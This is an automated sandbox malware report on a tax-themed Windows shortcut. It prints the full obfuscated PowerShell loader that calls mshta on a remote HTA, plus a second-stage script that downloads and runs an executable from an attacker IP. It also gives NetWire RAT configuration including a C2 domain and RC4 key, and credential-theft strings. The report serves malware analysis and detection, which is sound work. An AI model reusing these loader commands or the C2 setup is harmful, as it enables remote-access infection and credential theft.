File name: | VIRGINIA-TAX-RETURN-2021-US-EXT.lnk |
Full analysis: | https://app.any.run/tasks/ed84025e-17ad-4793-b002-7bb07b92bb86 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | August 12, 2022, 17:40:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Thu Nov 19 01:50:22 2020, mtime=Thu Aug 11 06:58:46 2022, atime=Thu Nov 19 01:50:22 2020, length=433152, window=hidenormalshowminimized |
MD5: | 0C8C19E19CC4DF9841C0B31BF42297DE |
SHA1: | 078EAB579439EDBCECB86556D14D60404F2F1E3E |
SHA256: | A814641ECE58BA618155C9267474A575A6423B7BD086C7B534E267E40292E2CE |
SSDEEP: | 48:8WnHJfY5217hniLRiLsn048asBxBcBjqdJ94W9k:8kHJfwCnOX048asBxe+9 |
.lnk | Windows Shortcut (100) |
MachineID: | desktop-7n4rmrr |
IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
CommandLineArguments: | -ExecutionPolicy UnRestricted $ryrZN='s/L4..4.h4t7t/51p/:9hht82aa2.Mth'; &(-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])) _* (-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])); _* => (-join($ryrZN[(-14568+14597),(49307-49307),(-33898+33906),(13922-13912),(14885-14860)])); foreach($prnBEcj in @((-22378+22386),(-52582+52592),(42983-42973),(7032-7016),(-60799+60817),(-20075+20076),(33369-33368),(3925-3906),(-11084+11098),(-28689+28693),(17784-17760),(-47470+47485),(-32558+32569),(-3094+3098),(52631-52607),(-2365+2368),(-55643+55666),(-43604+43608),(43856-43853),(2908-2905),(-15756+15757),(-55338+55346),(-24815+24819),(43407-43399),(-32952+32962),(-5600+5625))) {$zIGtAPwN+= $ryrZN[$prnBEcj]}; => $zIGtAPwN; |
RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
LocalBasePath: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
VolumeLabel: | - |
DriveType: | Fixed Disk |
TargetFileDOSName: | powershell.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 13 |
TargetFileSize: | 433152 |
ModifyDate: | 2020:11:19 03:50:22+01:00 |
AccessDate: | 2022:08:11 09:58:46+02:00 |
CreateDate: | 2020:11:19 03:50:22+01:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3060 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ryrZN='s/L4..4.h4t7t/51p/:9hht82aa2.Mth'; &(-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])) _* (-join($ryrZN[(49307-49307),(14885-14860),(-42127+42129)])); _* => (-join($ryrZN[(-14568+14597),(49307-49307),(-33898+33906),(13922-13912),(14885-14860)])); foreach($prnBEcj in @((-22378+22386),(-52582+52592),(42983-42973),(7032-7016),(-60799+60817),(-20075+20076),(33369-33368),(3925-3906),(-11084+11098),(-28689+28693),(17784-17760),(-47470+47485),(-32558+32569),(-3094+3098),(52631-52607),(-2365+2368),(-55643+55666),(-43604+43608),(43856-43853),(2908-2905),(-15756+15757),(-55338+55346),(-24815+24819),(43407-43399),(-32952+32962),(-5600+5625))) {$zIGtAPwN+= $ryrZN[$prnBEcj]}; => $zIGtAPwN; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
3616 | "C:\Windows\system32\mshta.exe" http://95.217.248.44/h.hta | C:\Windows\system32\mshta.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
2292 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function jZGsaiXMx($xyBOCKhyZPKOGE, $VwGkTkpaqCAI){[IO.File]::WriteAllBytes($xyBOCKhyZPKOGE, $VwGkTkpaqCAI)};function pmTDdXLWdhLK($xyBOCKhyZPKOGE){if($xyBOCKhyZPKOGE.EndsWith((rsATVTUqdVlwTyE @(58453,58507,58515,58515))) -eq $True){rundll32.exe $xyBOCKhyZPKOGE }elseif($xyBOCKhyZPKOGE.EndsWith((rsATVTUqdVlwTyE @(58453,58519,58522,58456))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $xyBOCKhyZPKOGE}else{Start-Process $xyBOCKhyZPKOGE}};function bIWIzNuUvf($VmmDjbnlwsbkVFWhKeUA){$WjfTjNGZLxxXEo = New-Object (rsATVTUqdVlwTyE @(58485,58508,58523,58453,58494,58508,58505,58474,58515,58512,58508,58517,58523));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VwGkTkpaqCAI = $WjfTjNGZLxxXEo.DownloadData($VmmDjbnlwsbkVFWhKeUA);return $VwGkTkpaqCAI};function rsATVTUqdVlwTyE($zhintux){$LXFcrnRl=58407;$RDPAvImGSUWUNZz=$Null;foreach($vDfgFpzWlaCLM in $zhintux){$RDPAvImGSUWUNZz+=[char]($vDfgFpzWlaCLM-$LXFcrnRl)};return $RDPAvImGSUWUNZz};function Zqrapntth(){$XJfNaPTXZjlYKZLGL = $env:AppData + '\';$rKiFSFUwMlFJUV = $XJfNaPTXZjlYKZLGL + 'IRS-Logo.svg';If(Test-Path -Path $rKiFSFUwMlFJUV){Invoke-Item $rKiFSFUwMlFJUV;}Else{ $pFSiicRZZXlQKwcBjF = bIWIzNuUvf (rsATVTUqdVlwTyE @(58511,58523,58523,58519,58522,58465,58454,58454,58526,58526,58526,58453,58512,58521,58522,58453,58510,58518,58525,58454,58523,58511,58508,58516,58508,58522,58454,58506,58524,58522,58523,58518,58516,58454,58519,58524,58519,58502,58505,58504,58522,58508,58454,58480,58489,58490,58452,58483,58518,58510,58518,58453,58522,58525,58510));jZGsaiXMx $rKiFSFUwMlFJUV $pFSiicRZZXlQKwcBjF;Invoke-Item $rKiFSFUwMlFJUV;};$KACXYAIfQ = $XJfNaPTXZjlYKZLGL + 'c.exe'; if (Test-Path -Path $KACXYAIfQ){pmTDdXLWdhLK $KACXYAIfQ;}Else{ $nbbdERcIDhhQEe = bIWIzNuUvf (rsATVTUqdVlwTyE @(58511,58523,58523,58519,58465,58454,58454,58464,58460,58453,58457,58456,58462,58453,58457,58459,58463,58453,58459,58459,58454,58506,58453,58508,58527,58508));jZGsaiXMx $KACXYAIfQ $nbbdERcIDhhQEe;pmTDdXLWdhLK $KACXYAIfQ;};;;;}Zqrapntth; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
2924 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Roaming\IRS-Logo.svg | C:\Program Files\Internet Explorer\iexplore.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
3984 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2924 CREDAT:144385 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
2120 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2924 CREDAT:333057 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Internet Explorer; Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
2724 | "C:\Users\admin\AppData\Roaming\c.exe" | C:\Users\admin\AppData\Roaming\c.exe | | powershell.exe | User: admin; Company: Irfan Skiljan; Integrity Level: MEDIUM; Description: IrfanView 32-bit; Version: 4.60.0.0
NetWire (PID) Process: | (2724) c.exe |
Strings (90): | GetProcessImageFileNameA Local Disk WinHttpOpen WinHttpGetProxyForUrl WinHttpGetIEProxyConfigForCurrentUser SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ SOFTWARE\Microsoft\Active Setup\Installed Components SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ SOFTWARE\Microsoft\Active Setup\Installed Components\%s StubPath [Esc] [Ctrl+%c] RegisterRawInputDevices GetRawInputData Secur32.dll LsaGetLogonSessionData LsaEnumerateLogonSessions SOFTWARE\Mozilla\%s\ CurrentVersion SOFTWARE\Mozilla\%s\%s\Main Install Directory mozutils.dll mozsqlite3.dll %s\logins.json PK11_GetInternalKeySlot PK11_Authenticate PL_Base64Decode SECITEM_ZfreeItem PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text select * from moz_logins hostname <name> <password> POP3 Server POP3 Password IMAP User IMAP Server IMAP Password HTTP User HTTP Server HTTP Password SMTP User SMTP Server SMTP Password EAS User EAS Server URL EAS Password POP3 Server POP3 Password IMAP User IMAP Server IMAP Password HTTP User HTTP Server HTTP Password SMTP User SMTP Server SMTP Password EAS User EAS Server URL EAS Password index.dat vaultcli.dll VaultOpenVault VaultCloseVault VaultGetItem GetModuleFileNameExA GetModuleFileNameExA GetNativeSystemInfo GlobalMemoryStatusEx HARDWARE\DESCRIPTION\System\CentralProcessor\0 Closed Listening... SYN Sent SYN Received Established Fin Wait (1) Fin Wait (2) Close Wait Closing... Last ACK Time Wait Delete TCB |
Keys: | RC4_key: 125d5d50bd35dcebe448a67adb0ffb46 |
Options: | Proxy: - ActiveX: - Startup_name: - Install_path: - Mutex: |
Credentials: | Password: Password123 |
Host: | HostId-%Rand% |
C2: | (1) septton.com:5389 |
(PID) Process: | (2724) c.exe |
Keys: | RC4_key: 125d5d50bd35dcebe448a67adb0ffb46 |
Options: | Keylogger_directory: - Sleep(s): 75 Offline_keylogger: false Use_a_mutex: true Registry_autorun: false Lock_executable: false Delete_original: false Copy_executable: false Proxy: Direct_connection ActiveX: false Startup_name: - Install_path: - Mutex: ObwQvAVd |
Credentials: | Password: Password123 |
Host: | HostId-uOm8m0 |
C2: | (1) septton.com:5389 |
PID | Process | Operation | Key | Name | Value
---|---|---|---|---|---
3060 | powershell.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16C\52C64B7E | LanguageList | en-US
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | 1
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | 1
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 1
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 0
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 460000003C010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix | 
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
3616 | mshta.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y67FBDPXM97508D0N7IH.temp | binary | 39F4AEF4615885C84D8193E6086A0E82 | 1247C0245FABAD86455D91830C13989B7402F823162F60BBA43D7FC8D63F53DD
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | der | EE87BB11E233C12009CC11725035DBDC | D82930A5B051B3C3F1639C24E83BDDF41D5AA66E467A0944D1AC3D59AE6330C5
3060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4cf1a02c6f2538b1.customDestinations-ms | binary | 39F4AEF4615885C84D8193E6086A0E82 | 1247C0245FABAD86455D91830C13989B7402F823162F60BBA43D7FC8D63F53DD
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | 707C24BFB397E919DAC5ADDA1B8DC7C7 | E8E645BAEB1F8EB8D3DB1CC508370B3B6864EB75D23AD9010BA75836EB7D2FDE
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\c.exe | executable | 01028A50EFA2F9E058F61A39B2B412C9 | 2FC97A9025F097A4C1040C2A50D644AD2979F56E8CAF337A1A788297F6BE7123
3060 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | 446DD1CF97EABA21CF14D03AEBC79F27 | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | image | DA597791BE3B6E732F0BC8B20E38EE62 | 5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\IRS-Logo.svg | image | 58004CA86F7B09A95B4C695EB612C01C | 3536108234988F9FEBFCE80CA86C2FD44ACC995593240C0E9E30399F46B27087
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | der | 290A85BD3E7285CDEDA1602A9E12A7DF | 17AE86541BE373B2DB8A4B77D7E7626966637E5A6052F290A3B598A56F5123C9
2924 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | binary | 6E595422455D68FF77532BF792D64125 | 92787CD1C9309C4C802946E2B4AFB76B678CE403486F258152B186578DEBC127
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2292 | powershell.exe | GET | 200 | 95.217.248.44:80 | http://95.217.248.44/c.exe | DE | executable | 2.03 Mb | malicious |
2924 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |
2924 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
3616 | mshta.exe | GET | 200 | 95.217.248.44:80 | http://95.217.248.44/h.hta | DE | html | 13.1 Kb | malicious |
2924 | iexplore.exe | GET | 200 | 178.79.242.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?317b80eb85edcc72 | DE | compressed | 4.70 Kb | whitelisted |
2924 | iexplore.exe | GET | 200 | 178.79.242.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2c79d80d2d259b37 | DE | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2924 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3616 | mshta.exe | 95.217.248.44:80 | — | Hetzner Online GmbH | DE | malicious |
2292 | powershell.exe | 95.217.248.44:80 | — | Hetzner Online GmbH | DE | malicious |
2292 | powershell.exe | 23.78.197.214:443 | www.irs.gov | Akamai Technologies, Inc. | US | unknown |
2924 | iexplore.exe | 131.253.33.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2924 | iexplore.exe | 178.79.242.128:80 | ctldl.windowsupdate.com | Limelight Networks, Inc. | DE | malicious |
2924 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2724 | c.exe | 31.41.244.150:5389 | septton.com | LLC DARNET | RU | malicious |
Domain | IP | Reputation
---|---|---
www.irs.gov | | suspicious
septton.com | | malicious
api.bing.com | | whitelisted
www.bing.com | | whitelisted
ctldl.windowsupdate.com | | whitelisted
ocsp.digicert.com | | whitelisted
iecvlist.microsoft.com | | whitelisted
r20swj13mr.microsoft.com | | whitelisted
PID | Process | Class | Message |
---|---|---|---|
3616 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3616 | mshta.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host HTA Request |
3616 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
2292 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
2292 | powershell.exe | A Network Trojan was detected | ET TROJAN Single char EXE direct download likely trojan (multiple families) |
2292 | powershell.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent |
2292 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
2292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |